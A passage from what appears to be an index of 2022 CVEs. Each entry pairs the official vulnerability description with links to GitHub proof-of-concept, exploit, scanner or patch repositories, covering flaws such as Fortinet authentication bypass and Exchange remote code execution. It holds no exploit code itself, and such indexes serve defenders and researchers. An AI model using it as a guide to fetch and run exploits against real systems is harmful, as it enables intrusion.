### CVE-2022-38766 (2023-01-03)

The remote keyless system on Renault ZOE 2021 vehicles sends 433.92 MHz RF signals from the same Rolling Codes set for each door-open request, which allows for a replay attack.

- [MalHyuk/CVE-2022-38766](https://github.com/MalHyuk/CVE-2022-38766)

### CVE-2022-38789 (2022-09-15)

An issue was discovered in Airties Smart Wi-Fi before 2020-08-04. It allows attackers to change the main/guest SSID and the PSK to arbitrary values, and map the LAN, because of Insecure Direct Object Reference.

- [ProxyStaffy/Airties-CVE-2022-38789](https://github.com/ProxyStaffy/Airties-CVE-2022-38789)

### CVE-2022-38813 (2022-11-25)

PHPGurukul Blood Donor Management System 1.0 does not properly restrict access to admin/dashboard.php, which allows attackers to access all data of users, delete the users, add and manage Blood Group, and Submit Report.

- [RashidKhanPathan/CVE-2022-38813](https://github.com/RashidKhanPathan/CVE-2022-38813)

### CVE-2022-39066 (2022-11-22)

There is a SQL injection vulnerability in ZTE MF286R. Due to insufficient validation of the input parameters of the phonebook interface, an authenticated attacker could use the vulnerability to execute arbitrary SQL injection.

- [v0lp3/CVE-2022-39066](https://github.com/v0lp3/CVE-2022-39066)

### CVE-2022-39073 (2023-01-06)

There is a command injection vulnerability in ZTE MF286R. Due to insufficient validation of the input parameters, an attacker could use the vulnerability to execute arbitrary commands.

- [v0lp3/CVE-2022-39073](https://github.com/v0lp3/CVE-2022-39073)

### CVE-2022-39196 (2022-09-04)

Blackboard Learn 1.10.1 allows remote authenticated users to read unintended files by entering student credentials and then directly visiting a certain webapps/bbcms/execute/ URL. Note: The vendor disputes this stating this cannot be reproduced.

- [DayiliWaseem/CVE-2022-39196-](https://github.com/DayiliWaseem/CVE-2022-39196-)

### CVE-2022-39197 (2022-09-22)

An XSS (Cross Site Scripting) vulnerability was found in HelpSystems Cobalt Strike through 4.7 that allowed a remote attacker to execute HTML on the Cobalt Strike teamserver. To exploit the vulnerability, one must first inspect a Cobalt Strike payload, and then modify the username field in the payload (or create a new payload with the extracted information and then modify that username field to be malformed).

- [safe3s/CVE-2022-39197](https://github.com/safe3s/CVE-2022-39197)
- [zeoday/cobaltstrike4.5_cdf-1](https://github.com/zeoday/cobaltstrike4.5_cdf-1)
- [burpheart/cve-2022-39197](https://github.com/burpheart/cve-2022-39197)
- [xzajyjs/CVE-2022-39197-POC](https://github.com/xzajyjs/CVE-2022-39197-POC)
- [yqcs/CSPOC](https://github.com/yqcs/CSPOC)
- [purple-WL/Cobaltstrike-RCE-CVE-2022-39197](https://github.com/purple-WL/Cobaltstrike-RCE-CVE-2022-39197)
- [lovechoudoufu/about_cobaltstrike4.5_cdf](https://github.com/lovechoudoufu/about_cobaltstrike4.5_cdf)
- [burpheart/CVE-2022-39197-patch](https://github.com/burpheart/CVE-2022-39197-patch)
- [hluwa/cobaltstrike_swing_xss2rce](https://github.com/hluwa/cobaltstrike_swing_xss2rce)
- [4nth0ny1130/CVE-2022-39197-fix_patch](https://github.com/4nth0ny1130/CVE-2022-39197-fix_patch)
- [its-arun/CVE-2022-39197](https://github.com/its-arun/CVE-2022-39197)
- [TheCryingGame/CVE-2022-39197-RCE](https://github.com/TheCryingGame/CVE-2022-39197-RCE)
- [adeljck/CVE-2022-39197](https://github.com/adeljck/CVE-2022-39197)
- [xiao-zhu-zhu/pig_CS4.4](https://github.com/xiao-zhu-zhu/pig_CS4.4)
- [Romanc9/Gui-poc-test](https://github.com/Romanc9/Gui-poc-test)

### CVE-2022-39227 (2022-09-23)

python-jwt is a module for generating and verifying JSON Web Tokens. Versions prior to 3.3.4 are subject to Authentication Bypass by Spoofing, resulting in identity spoofing, session hijacking or authentication bypass. An attacker who obtains a JWT can arbitrarily forge its contents without knowing the secret key. Depending on the application, this may for example enable the attacker to spoof other users' identities, hijack their sessions, or bypass authentication. Users should upgrade to version 3.3.4. There are no known workarounds.

- [user0x1337/CVE-2022-39227](https://github.com/user0x1337/CVE-2022-39227)
- [NoSpaceAvailable/CVE-2022-39227](https://github.com/NoSpaceAvailable/CVE-2022-39227)

### CVE-2022-39253 (2022-10-19)

Git is an open source, scalable, distributed revision control system. Versions prior to 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4 are subject to exposure of sensitive information to a malicious actor. When performing a local clone (where the source and target of the clone are on the same volume), Git copies the contents of the source's `$GIT_DIR/objects` directory into the destination by either creating hardlinks to the source contents, or copying them (if hardlinks are disabled via `--no-hardlinks`). A malicious actor could convince a victim to clone a repository with a symbolic link pointing at sensitive information on the victim's machine. This can be done either by having the victim clone a malicious repository on the same machine, or having them clone a malicious repository embedded as a bare repository via a submodule from any source, provided they clone with the `--recurse-submodules` option. Git does not create symbolic links in the `$GIT_DIR/objects` directory. The problem has been patched in the versions published on 2022-10-18, and backported to v2.30.x. Potential workarounds: Avoid cloning untrusted repositories using the `--local` optimization when on a shared machine, either by passing the `--no-local` option to `git clone` or cloning from a URL that uses the `file://` scheme. Alternatively, avoid cloning repositories from untrusted sources with `--recurse-submodules` or run `git config --global protocol.file.allow user`.

- [ssst0n3/docker-cve-2022-39253-poc](https://github.com/ssst0n3/docker-cve-2022-39253-poc)
- [HiImDarwin/NetworkSecurityFinalProject](https://github.com/HiImDarwin/NetworkSecurityFinalProject)

### CVE-2022-39299 (2022-10-12)

Passport-SAML is a SAML 2.0 authentication provider for Passport, the Node.js authentication library. A remote attacker may be able to bypass SAML authentication on a website using passport-saml. A successful attack requires that the attacker is in possession of an arbitrary IDP signed XML element. Depending on the IDP used, fully unauthenticated attacks (e.g without access to a valid user) might also be feasible if generation of a signed message can be triggered. Users should upgrade to passport-saml version 3.2.2 or newer. The issue was also present in the beta releases of `node-saml` before version 4.0.0-beta.5. If you cannot upgrade, disabling SAML authentication may be done as a workaround.

- [doyensec/CVE-2022-39299_PoC_Generator](https://github.com/doyensec/CVE-2022-39299_PoC_Generator)

### CVE-2022-39425 (2022-10-18)

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.40. Difficult to exploit vulnerability allows unauthenticated attacker with network access via VRDP to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [bob11vrdp/CVE-2022-39425](https://github.com/bob11vrdp/CVE-2022-39425)

### CVE-2022-39802 (2022-10-11)

SAP Manufacturing Execution - versions 15.1, 15.2, 15.3, allows an attacker to exploit insufficient validation of a file path request parameter. The intended file path can be manipulated to allow arbitrary traversal of directories on the remote server. The file content within each directory can be read which may lead to information disclosure.

- [vah13/CVE-2022-39802](https://github.com/vah13/CVE-2022-39802)
- [redrays-io/CVE-2022-39802](https://github.com/redrays-io/CVE-2022-39802)

### CVE-2022-39838 (2022-09-05)

Systematic FIX Adapter (ALFAFX) 2.4.0.25 13/09/2017 allows remote file inclusion via a UNC share pathname, and also allows absolute path traversal to local pathnames.

- [jet-pentest/CVE-2022-39838](https://github.com/jet-pentest/CVE-2022-39838)

### CVE-2022-39841
- [stealthcopter/CVE-2022-39841](https://github.com/stealthcopter/CVE-2022-39841)

### CVE-2022-39952 (2023-02-16)

An external control of file name or path in Fortinet FortiNAC versions 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, 8.3.7 may allow an unauthenticated attacker to execute unauthorized code or commands via a specifically crafted HTTP request.

- [horizon3ai/CVE-2022-39952](https://github.com/horizon3ai/CVE-2022-39952)
- [shiyeshu/CVE-2022-39952_webshell](https://github.com/shiyeshu/CVE-2022-39952_webshell)
- [Chocapikk/CVE-2022-39952](https://github.com/Chocapikk/CVE-2022-39952)
- [dkstar11q/CVE-2022-39952-better](https://github.com/dkstar11q/CVE-2022-39952-better)

### CVE-2022-39959 (2022-10-07)

Panini Everest Engine 2.0.4 allows unprivileged users to create a file named Everest.exe in the %PROGRAMDATA%\Panini folder. This leads to privilege escalation because a service, running as SYSTEM, uses the unquoted path of %PROGRAMDATA%\Panini\Everest Engine\EverestEngine.exe and therefore a Trojan horse %PROGRAMDATA%\Panini\Everest.exe may be executed instead of the intended vendor-supplied EverestEngine.exe file.

- [usmarine2141/CVE-2022-39959](https://github.com/usmarine2141/CVE-2022-39959)

### CVE-2022-39986 (2023-08-01)

A command injection vulnerability in RaspAP 2.8.0 through 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.

- [mind2hex/CVE-2022-39986](https://github.com/mind2hex/CVE-2022-39986)
- [tucommenceapousser/RaspAP-CVE-2022-39986-PoC](https://github.com/tucommenceapousser/RaspAP-CVE-2022-39986-PoC)

### CVE-2022-39987 (2023-08-01)

A command injection vulnerability in RaspAP 2.8.0 through 2.9.2 allows an authenticated attacker to execute arbitrary OS commands as root via the "entity" POST parameter in /ajax/networking/get_wgkey.php.

- [miguelc49/CVE-2022-39987-2](https://github.com/miguelc49/CVE-2022-39987-2)
- [miguelc49/CVE-2022-39987-1](https://github.com/miguelc49/CVE-2022-39987-1)
- [miguelc49/CVE-2022-39987-3](https://github.com/miguelc49/CVE-2022-39987-3)

### CVE-2022-40032 (2023-02-17)

SQL Injection vulnerability in Simple Task Managing System version 1.0 in login.php in 'username' and 'password' parameters, allows attackers to execute arbitrary code and gain sensitive information.

- [h4md153v63n/CVE-2022-40032_Simple-Task-Managing-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated](https://github.com/h4md153v63n/CVE-2022-40032_Simple-Task-Managing-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated)

### CVE-2022-40126 (2022-09-29)

A misconfiguration in the Service Mode profile directory of Clash for Windows v0.19.9 allows attackers to escalate privileges and execute arbitrary commands when Service Mode is activated.

- [LovelyWei/CVE-2022-40126](https://github.com/LovelyWei/CVE-2022-40126)

### CVE-2022-40127 (2022-11-14)

A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs to execute arbitrary commands via a manually provided run_id parameter. This issue affects Apache Airflow versions prior to 2.4.0.

- [Mr-xn/CVE-2022-40127](https://github.com/Mr-xn/CVE-2022-40127)
- [jakabakos/CVE-2022-40127-Airflow-RCE](https://github.com/jakabakos/CVE-2022-40127-Airflow-RCE)

### CVE-2022-40140 (2022-09-19)

An origin validation error vulnerability in Trend Micro Apex One and Apex One as a Service could allow a local attacker to cause a denial-of-service on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.

- [mr-r3b00t/NotProxyShellHunter](https://github.com/mr-r3b00t/NotProxyShellHunter)
- [ZephrFish/NotProxyShellScanner](https://github.com/ZephrFish/NotProxyShellScanner)
- [ipsBruno/CVE-2022-40140-SCANNER](https://github.com/ipsBruno/CVE-2022-40140-SCANNER)

### CVE-2022-40146 (2022-09-22)

Server-Side Request Forgery (SSRF) vulnerability in Batik of Apache XML Graphics allows an attacker to access files using a Jar url. This issue affects Apache XML Graphics Batik 1.14.

- [cckuailong/CVE-2022-40146_Exploit_Jar](https://github.com/cckuailong/CVE-2022-40146_Exploit_Jar)
- [soulfoodisgood/CVE-2022-40146](https://github.com/soulfoodisgood/CVE-2022-40146)

### CVE-2022-40297 (2022-09-08)

UBports Ubuntu Touch 16.04 allows the screen-unlock passcode to be used for a privileged shell via Sudo. This passcode is only four digits, far below typical length/complexity for a user account's password. NOTE: a third party states "The described attack cannot be executed as demonstrated.

- [filipkarc/PoC-ubuntutouch-pin-privesc](https://github.com/filipkarc/PoC-ubuntutouch-pin-privesc)

### CVE-2022-40317 (2022-09-09)

OpenKM 6.3.11 allows stored XSS related to the javascript: substring in an A element.

- [izdiwho/CVE-2022-40317](https://github.com/izdiwho/CVE-2022-40317)

### CVE-2022-40347 (2023-02-17)

SQL Injection vulnerability in Intern Record System version 1.0 in /intern/controller.php in 'phone', 'email', 'deptType' and 'name' parameters, allows attackers to execute arbitrary code and gain sensitive information.

- [h4md153v63n/CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated](https://github.com/h4md153v63n/CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated)

### CVE-2022-40348 (2023-02-18)

Cross Site Scripting (XSS) vulnerability in Intern Record System version 1.0 in /intern/controller.php in 'name' and 'email' parameters, allows attackers to execute arbitrary code.

- [h4md153v63n/CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated](https://github.com/h4md153v63n/CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated)

### CVE-2022-40363 (2022-09-29)

A buffer overflow in the component nfc_device_load_mifare_ul_data of Flipper Devices Inc., Flipper Zero before v0.65.2 allows attackers to cause a Denial of Service (DoS) via a crafted NFC file.

- [Olafdaf/CVE-2022-40363](https://github.com/Olafdaf/CVE-2022-40363)

### CVE-2022-40470 (2022-11-21)

Phpgurukul Blood Donor Management System 1.0 allows Cross Site Scripting via Add Blood Group Name Feature.

- [RashidKhanPathan/CVE-2022-40470](https://github.com/RashidKhanPathan/CVE-2022-40470)

### CVE-2022-40471 (2022-10-31)

Remote Code Execution in Clinic's Patient Management System v1.0 allows an attacker to upload an arbitrary PHP webshell via the profile picture upload functionality in users.php.

- [RashidKhanPathan/CVE-2022-40471](https://github.com/RashidKhanPathan/CVE-2022-40471)

### CVE-2022-40490
- [whitej3rry/CVE-2022-40490](https://github.com/whitej3rry/CVE-2022-40490)

### CVE-2022-40494 (2022-10-06)

NPS before v0.26.10 was discovered to contain an authentication bypass vulnerability via constantly generating and sending the Auth key and Timestamp parameters.

- [carr0t2/nps-auth-bypass](https://github.com/carr0t2/nps-auth-bypass)

### CVE-2022-40624 (2022-12-20)

pfSense pfBlockerNG through 2.1.4_27 allows remote attackers to execute arbitrary OS commands as root via the HTTP Host header, a different vulnerability than CVE-2022-31814.

- [dhammon/pfBlockerNg-CVE-2022-40624](https://github.com/dhammon/pfBlockerNg-CVE-2022-40624)

### CVE-2022-40634 (2022-09-13)

Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via FreeMarker SSTI.

- [mbadanoiu/CVE-2022-40634](https://github.com/mbadanoiu/CVE-2022-40634)

### CVE-2022-40635 (2022-09-13)

Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via Groovy Sandbox Bypass.

- [mbadanoiu/CVE-2022-40635](https://github.com/mbadanoiu/CVE-2022-40635)

### CVE-2022-40684 (2022-10-18)

An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 allows an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.

- [horizon3ai/CVE-2022-40684](https://github.com/horizon3ai/CVE-2022-40684)
- [carlosevieira/CVE-2022-40684](https://github.com/carlosevieira/CVE-2022-40684)
- [Filiplain/Fortinet-PoC-Auth-Bypass](https://github.com/Filiplain/Fortinet-PoC-Auth-Bypass)
- [kljunowsky/CVE-2022-40684-POC](https://github.com/kljunowsky/CVE-2022-40684-POC)
- [secunnix/CVE-2022-40684](https://github.com/secunnix/CVE-2022-40684)
- [iveresk/CVE-2022-40684](https://github.com/iveresk/CVE-2022-40684)
- [mhd108/CVE-2022-40684](https://github.com/mhd108/CVE-2022-40684)
- [ClickCyber/cve-2022-40684](https://github.com/ClickCyber/cve-2022-40684)
- [Chocapikk/CVE-2022-40684](https://github.com/Chocapikk/CVE-2022-40684)
- [mohamedbenchikh/CVE-2022-40684](https://github.com/mohamedbenchikh/CVE-2022-40684)
- [HAWA771/CVE-2022-40684](https://github.com/HAWA771/CVE-2022-40684)
- [NeriaBasha/CVE-2022-40684](https://github.com/NeriaBasha/CVE-2022-40684)
- [Grapphy/fortipwn](https://github.com/Grapphy/fortipwn)
- [puckiestyle/CVE-2022-40684](https://github.com/puckiestyle/CVE-2022-40684)
- [jsongmax/Fortinet-CVE-2022-40684](https://github.com/jsongmax/Fortinet-CVE-2022-40684)
- [und3sc0n0c1d0/CVE-2022-40684](https://github.com/und3sc0n0c1d0/CVE-2022-40684)
- [qingsiweisan/CVE-2022-40684](https://github.com/qingsiweisan/CVE-2022-40684)
- [TaroballzChen/CVE-2022-40684-metasploit-scanner](https://github.com/TaroballzChen/CVE-2022-40684-metasploit-scanner)
- [gustavorobertux/gotigate](https://github.com/gustavorobertux/gotigate)
- [hughink/CVE-2022-40684](https://github.com/hughink/CVE-2022-40684)
- [notareaperbutDR34P3r/CVE-2022-40684-Rust](https://github.com/notareaperbutDR34P3r/CVE-2022-40684-Rust)
- [z-bool/CVE-2022-40684](https://github.com/z-bool/CVE-2022-40684)
- [Anthony1500/CVE-2022-40684](https://github.com/Anthony1500/CVE-2022-40684)

### CVE-2022-40687 (2022-11-18)

Cross-Site Request Forgery (CSRF) vulnerability in Creative Mail plugin <= 1.5.4 on WordPress.

- [williamkhepri/CVE-2022-40687-metasploit-scanner](https://github.com/williamkhepri/CVE-2022-40687-metasploit-scanner)

### CVE-2022-40769 (2022-09-18)

profanity through 1.60 has only four billion possible RNG initializations. Thus, attackers can recover private keys from Ethereum vanity addresses and steal cryptocurrency, as exploited in the wild in June 2022.

- [PLSRcoin/CVE-2022-40769](https://github.com/PLSRcoin/CVE-2022-40769)

### CVE-2022-40799 (2022-11-29)

Data Integrity Failure in 'Backup Config' in D-Link DNR-322L <= 2.60B15 allows an authenticated attacker to execute OS level commands on the device.

- [rtfmkiesel/CVE-2022-40799](https://github.com/rtfmkiesel/CVE-2022-40799)

### CVE-2022-40881 (2022-11-17)

SolarView Compact 6.00 was discovered to contain a command injection vulnerability via network_test.php.

- [yilin1203/CVE-2022-40881](https://github.com/yilin1203/CVE-2022-40881)

### CVE-2022-40916
- [whitej3rry/CVE-2022-40916](https://github.com/whitej3rry/CVE-2022-40916)

### CVE-2022-41032 (2022-10-11)

NuGet Client Elevation of Privilege Vulnerability

- [ethomson/cve-2022-41032](https://github.com/ethomson/cve-2022-41032)

### CVE-2022-41034 (2022-10-11)

Visual Studio Code Remote Code Execution Vulnerability

- [andyhsu024/CVE-2022-41034](https://github.com/andyhsu024/CVE-2022-41034)

### CVE-2022-41040 (2022-10-03)

Microsoft Exchange Server Elevation of Privilege Vulnerability

- [numanturle/CVE-2022-41040](https://github.com/numanturle/CVE-2022-41040)
- [CentarisCyber/CVE-2022-41040_Mitigation](https://github.com/CentarisCyber/CVE-2022-41040_Mitigation)
- [r3dcl1ff/CVE-2022-41040](https://github.com/r3dcl1ff/CVE-2022-41040)
- [d3duct1v/CVE-2022-41040](https://github.com/d3duct1v/CVE-2022-41040)
- [kljunowsky/CVE-2022-41040-POC](https://github.com/kljunowsky/CVE-2022-41040-POC)
- [rjsudlow/proxynotshell-IOC-Checker](https://github.com/rjsudlow/proxynotshell-IOC-Checker)
- [ITPATJIDR/CVE-2022-41040](https://github.com/ITPATJIDR/CVE-2022-41040)
- [TaroballzChen/CVE-2022-41040-metasploit-ProxyNotShell](https://github.com/TaroballzChen/CVE-2022-41040-metasploit-ProxyNotShell)

### CVE-2022-41049 (2022-11-09)

Windows Mark of the Web Security Feature Bypass Vulnerability

- [Nathan01110011/CVE-2022-41049-POC](https://github.com/Nathan01110011/CVE-2022-41049-POC)

### CVE-2022-41080 (2022-11-09)

Microsoft Exchange Server Elevation of Privilege Vulnerability

- [ohnonoyesyes/CVE-2022-41080](https://github.com/ohnonoyesyes/CVE-2022-41080)

### CVE-2022-41082 (2022-10-03)

Microsoft Exchange Server Remote Code Execution Vulnerability

- [Diverto/nse-exchange](https://github.com/Diverto/nse-exchange)
- [notareaperbutDR34P3r/http-vuln-CVE-2022-41082](https://github.com/notareaperbutDR34P3r/http-vuln-CVE-2022-41082)
- [sikkertech/CVE-2022-41082](https://github.com/sikkertech/CVE-2022-41082)
- [balki97/OWASSRF-CVE-2022-41082-POC](https://github.com/balki97/OWASSRF-CVE-2022-41082-POC)
- [bigherocenter/CVE-2022-41082-POC](https://github.com/bigherocenter/CVE-2022-41082-POC)
- [notareaperbutDR34P3r/vuln-CVE-2022-41082](https://github.com/notareaperbutDR34P3r/vuln-CVE-2022-41082)
- [SUPRAAA-1337/CVE-2022-41082](https://github.com/SUPRAAA-1337/CVE-2022-41082)
- [soltanali0/CVE-2022-41082](https://github.com/soltanali0/CVE-2022-41082)

### CVE-2022-41099 (2022-11-09)

BitLocker Security Feature Bypass Vulnerability

- [halsey51013/UpdateWindowsRE-CVE-2022-41099](https://github.com/halsey51013/UpdateWindowsRE-CVE-2022-41099)
- [o0MattE0o/CVE-2022-41099-Fix](https://github.com/o0MattE0o/CVE-2022-41099-Fix)
- [g-gill24/WinRE-Patch](https://github.com/g-gill24/WinRE-Patch)
- [dsn1321/KB5025175-CVE-2022-41099](https://github.com/dsn1321/KB5025175-CVE-2022-41099)

### CVE-2022-41114 (2022-11-09)

Windows Bind Filter Driver Elevation of Privilege Vulnerability

- [gmh5225/CVE-2022-41114](https://github.com/gmh5225/CVE-2022-41114)

### CVE-2022-41218 (2022-09-21)

In drivers/media/dvb-core/dmxdev.c in the Linux kernel through 5.19.10, there is a use-after-free caused by refcount races, affecting dvb_demux_open and dvb_dmxdev_release.

- [Tobey123/CVE-2022-41218](https://github.com/Tobey123/CVE-2022-41218)

### CVE-2022-41220 (2022-09-21)

md2roff 1.9 has a stack-based buffer overflow via a Markdown file, a different vulnerability than CVE-2022-34913. NOTE: the vendor's position is that the product is not intended for untrusted input.

- [Halcy0nic/CVE-2022-41220](https://github.com/Halcy0nic/CVE-2022-41220)

### CVE-2022-41272 (2022-12-13)

An unauthenticated attacker over the network can attach to an open interface exposed through JNDI by the User Defined Search (UDS) of SAP NetWeaver Process Integration (PI) - version 7.50 and make use of an open naming and directory API to access services which can be used to perform unauthorized operations affecting users and data across the entire system. This allows the attacker to have full read access to user data, make limited modifications to user data, and degrade the performance of the system, leading to a high impact on confidentiality and a limited impact on the availability and integrity of the application.

- [redrays-io/CVE-2022-41272](https://github.com/redrays-io/CVE-2022-41272)

### CVE-2022-41333 (2023-03-07)

An uncontrolled resource consumption vulnerability [CWE-400] in FortiRecorder version 6.4.3 and below, 6.0.11 and below login authentication mechanism may allow an unauthenticated attacker to make the device unavailable via crafted GET requests.

- [polar0x/CVE-2022-41333](https://github.com/polar0x/CVE-2022-41333)

### CVE-2022-41343 (2022-09-25)

registerFont in FontMetrics.php in Dompdf before 2.0.1 allows remote file inclusion because a URI validation failure does not halt font registration, as demonstrated by a @font-face rule.

- [BKreisel/CVE-2022-41343](https://github.com/BKreisel/CVE-2022-41343)

### CVE-2022-41352 (2022-09-26)

An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavis via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). Once pax is installed, amavis automatically prefers it over cpio.

- [segfault-it/cve-2022-41352](https://github.com/segfault-it/cve-2022-41352)
- [Cr4ckC4t/cve-2022-41352-zimbra-rce](https://github.com/Cr4ckC4t/cve-2022-41352-zimbra-rce)
- [lolminerxmrig/cve-2022-41352-zimbra-rce-1](https://github.com/lolminerxmrig/cve-2022-41352-zimbra-rce-1)
- [qailanet/cve-2022-41352-zimbra-rce](https://github.com/qailanet/cve-2022-41352-zimbra-rce)

### CVE-2022-41358 (2022-10-20)

A stored cross-site scripting (XSS) vulnerability in Garage Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the categoriesName parameter in createCategories.php.

- [thecasual/CVE-2022-41358](https://github.com/thecasual/CVE-2022-41358)

### CVE-2022-41401 (2023-08-04)

OpenRefine <= v3.5.2 contains a Server-Side Request Forgery (SSRF) vulnerability, which permits unauthorized users to exploit the system, potentially leading to unauthorized access to internal resources and sensitive file disclosure.

- [ixSly/CVE-2022-41401](https://github.com/ixSly/CVE-2022-41401)

### CVE-2022-41412 (2022-11-30)

An issue in the graphData.cgi component of perfSONAR v4.4.5 and prior allows attackers to access sensitive data and execute Server-Side Request Forgery (SSRF) attacks.

- [renmizo/CVE-2022-41412](https://github.com/renmizo/CVE-2022-41412)

### CVE-2022-41413 (2022-11-30)

perfSONAR v4.x <= v4.4.5 was discovered to contain a Cross-Site Request Forgery (CSRF) which is triggered when an attacker injects crafted input into the Search function.

- [renmizo/CVE-2022-41413](https://github.com/renmizo/CVE-2022-41413)

### CVE-2022-41445 (2022-11-22)

A cross-site scripting (XSS) vulnerability in Record Management System using CodeIgniter 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Add Subject page.

- [RashidKhanPathan/CVE-2022-41445](https://github.com/RashidKhanPathan/CVE-2022-41445)

### CVE-2022-41446 (2022-11-23)

An access control issue in /Admin/dashboard.php of Record Management System using CodeIgniter v1.0 allows attackers to access and modify user data.

- [RashidKhanPathan/CVE-2022-41446](https://github.com/RashidKhanPathan/CVE-2022-41446)

### CVE-2022-41540 (2022-10-18)

The web app client of TP-Link AX10v1 V1_211117 uses hard-coded cryptographic keys when communicating with the router. Attackers who are able to intercept the communications between the web client and router through a man-in-the-middle attack can then obtain the sequence key via a brute-force attack, and access sensitive information.

- [efchatz/easy-exploits](https://github.com/efchatz/easy-exploits)

### CVE-2022-41544 (2022-10-18)

GetSimple CMS v3.3.16 was discovered to contain a remote code execution (RCE) vulnerability via the edited_file parameter in admin/theme-edit.php.

- [yosef0x01/CVE-2022-41544](https://github.com/yosef0x01/CVE-2022-41544)
- [h3xcr4ck3r/CVE-2022-41544](https://github.com/h3xcr4ck3r/CVE-2022-41544)

### CVE-2022-41622 (2022-12-07)

In all versions, BIG-IP and BIG-IQ are vulnerable to cross-site request forgery (CSRF) attacks through iControl SOAP. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

- [rbowes-r7/refreshing-soap-exploit](https://github.com/rbowes-r7/refreshing-soap-exploit)

### CVE-2022-41717 (2022-12-08)

An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.

- [domdom82/h2conn-exploit](https://github.com/domdom82/h2conn-exploit)

### CVE-2022-41741 (2022-10-19)

NGINX Open Source before versions 1.23.2 and 1.22.1, NGINX Open Source Subscription before versions R2 P1 and R1 P1, and NGINX Plus before versions R27 P1 and R26 P1 have a vulnerability in the module ngx_http_mp4_module that might allow a local attacker to corrupt NGINX worker memory, resulting in its termination or potential other impact using a specially crafted audio or video file. The issue affects only NGINX products that are built with the ngx_http_mp4_module, when the mp4 directive is used in the configuration file. Further, the attack is possible only if an attacker can trigger processing of a specially crafted audio or video file with the module ngx_http_mp4_module.

- [dumbbutt0/evilMP4](https://github.com/dumbbutt0/evilMP4)

### CVE-2022-41828 (2022-09-29)

In Amazon AWS Redshift JDBC Driver (aka amazon-redshift-jdbc-driver or redshift-jdbc42) before 2.1.0.8, the Object Factory does not check the class type when instantiating an object from a class name.

- [murataydemir/CVE-2022-41828](https://github.com/murataydemir/CVE-2022-41828)

### CVE-2022-41852
- [Warxim/CVE-2022-41852](https://github.com/Warxim/CVE-2022-41852)
- [xpectomas/CVE-2022-41852-Disable](https://github.com/xpectomas/CVE-2022-41852-Disable)

### CVE-2022-41853 (2022-10-06)

Those using java.sql.Statement or java.sql.PreparedStatement in hsqldb (HyperSQL DataBase) to process untrusted input may be vulnerable to a remote code execution attack. By default it is allowed to call any static method of any Java class in the classpath resulting in code execution. The issue can be prevented by updating to 2.7.1 or by setting the system property "hsqldb.method_class_names" to classes which are allowed to be called. For example, System.setProperty("hsqldb.method_class_names", "abc") or Java argument -Dhsqldb.method_class_names="abc" can be used. From version 2.7.1 all classes by default are not accessible except those in java.lang.Math and need to be manually enabled.

- [mbadanoiu/CVE-2022-41853](https://github.com/mbadanoiu/CVE-2022-41853)

### CVE-2022-41876 (2022-11-10)

ezplatform-graphql is a GraphQL server implementation for Ibexa DXP and Ibexa Open Source. Versions prior to 2.3.12 and 1.0.13 are subject to Insecure Storage of Sensitive Information. Unauthenticated GraphQL queries for user accounts can expose password hashes of users that have created or modified content, typically administrators and editors. This issue has been patched in versions 2.3.12, and 1.0.13 on the 1.X branch. Users unable to upgrade can remove the "passwordHash" entry from "src/bundle/Resources/config/graphql/User.types.yaml" in the GraphQL package, and other properties like hash type, email, login if you prefer.

- [Skileau/CVE-2022-41876](https://github.com/Skileau/CVE-2022-41876)

### CVE-2022-41903 (2023-01-17)

